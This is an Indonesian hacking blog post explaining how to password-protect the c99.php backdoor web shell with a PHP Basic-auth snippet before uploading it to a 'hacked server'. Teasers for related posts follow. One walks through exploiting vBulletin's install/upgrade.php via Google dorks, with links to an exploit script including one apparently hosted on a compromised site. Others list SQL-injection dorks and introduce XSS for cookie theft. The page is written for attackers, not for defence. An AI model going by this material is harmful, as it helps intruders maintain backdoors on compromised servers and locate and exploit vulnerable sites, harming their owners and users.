Cara memberi password pada shell backdoor




misalnya saya akan memberi password pada shell backdoor c99.php
yang mempunyai script



lalu Masukan script berikut tepat di bawah <?php

// --- pop-up

$user = "isi-username";

$pass = "isi-password";

 if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))

 {

  header("WWW-Authenticate: Basic realm=\"dvildance was here\"");

  header("HTTP/1.0 401 Unauthorized");

  exit();

 }

// --- php shell 
jadinya




lalu upload di server hasil hack dan panggil shell anda
 maka muncul popup password



SUKSES . . .


Note :

Tidak semu host mendukung adanya script pop-up di atas, jadi harap di coba sebelum memberi password pada php shell.Tapi kebanyakan mendukung pop-up
 

Comments

Post a Comment

Popular posts from this blog

Hack vbulletin forum dengan upgrade exploit + upload shell backdoor

Image
Tutor kali ini akan mempraktekkan bagaimana cara exploit website yang beraliran cms vbulletin ok langsung saja ya kita butuhkan dork terlebih dahulu Inurl:/ / install/upgrade.php intext: vBulletin  4.2.1  Upgrade System intext: vbulletin-style.xml copy salah satu dork tersebut lalu tulis di google untuk mencari web site yang rentan akan exploit nya   setelah itu buka web nya  lalu masukkan exploitnya  / install/upgrade.php misalnya : http://websitetarget.com /install/upgrade.php kemudian ctrl + U halamanya  dan anda akan di baa ke halaman source code halaman dan cari  CUSTNUMBER setelah mengcopy custnumbernya sekarang download script nya https://dl.dropboxusercontent.com/s/rmk6y85fr7g11vo/0dayVbulletin-upgrade.php?token_hash=AAGnO5qdtsLUZtvgE87xJo10mNIXjA4gZQbbQBfwTD4w9g&dl=1 setelah download upload script tersebut ke hosting anda atau bisa gunakan punya saya http://partisikantor-sms.com/clearbox/language/en/0dayVbulletin-upgrade.php  setelah itu copy url korban , customer id is
Read more

Dork Sql injection

Image
Langsung saja share dork sql injection silahkan masukkan salah satu keyword di bawah pada kotak pencarian google intext:�error in your SQL syntax� +site:in intext:�mysql_num_rows()� +site:in intext:�mysql_fetch_array()� +site:in intext:�Error Occurred While Processing Request� +site:in intext:�Server Error in �/� Application� +site:in intext:�Microsoft OLE DB Provider for ODBC Drivers error� +site:in intext:�Invalid Querystring� +site:in intext:�OLE DB Provider for ODBC� +site:in intext:�VBScript Runtime� +site:in intext:�ADODB.Field� +site:in intext:�BOF or EOF� +site:in intext:�ADODB.Command� +site:in intext:�JET Database� +site:in intext:�mysql_fetch_row()� +site:in intext:�Syntax error� +site:in intext:�include()� +site:in intext:�mysql_fetch_assoc()� +site:in intext:�mysql_fetch_object()� +site:in intext:�mysql_numrows()� +site:in intext:�GetArray()� +site:in intext:�FetchRow()� +site:in intext:�Input string was not in a correct format� +site:in inurl:/general.php?*id=* inurl:/car
Read more

Tutorial dasar xss

Image
Cross Site Scripting atau biasa dikenal dengan XSS merupakan salah satu vulnerability pada website yang kerap kali dapat ditemukan pada aplikasi website dan dapat digunakan oleh pihak-pihak yang tidak bertanggungjawab untuk mengeksekusi code HTML atau javascript pada komputer korban. Umumnya komputer yang menjadi korban adalah mereka yang mengakses website yang vulnerable. Tujuan  Tujuan dari peretas mengeksploitasi celah keamanan menggunakan teknik XSS adalah untuk mecuri cookie yang ada di komputer client (cookie stealing), Melakukan redirection URL dengan maksud �tertentu� (URL Redirection) melalui teknik kejahatan yang dinamakan phising dan lainnya. Tujuan lain dari tulisan ini dibuat adalah untuk menambah pemahaman kita tentang serangan dengan menggunakan XSS dan perbedaan antara teknik yang satu dan lainnya dalam mengeksploitasi vulnerability XSS. Jenis-jenis Cross Site Scripting (XSS) Secara umum, teknik XSS ini dibagi dalam tiga kelompok yaitu DOM Based XSS, Non-persistent XSS
Read more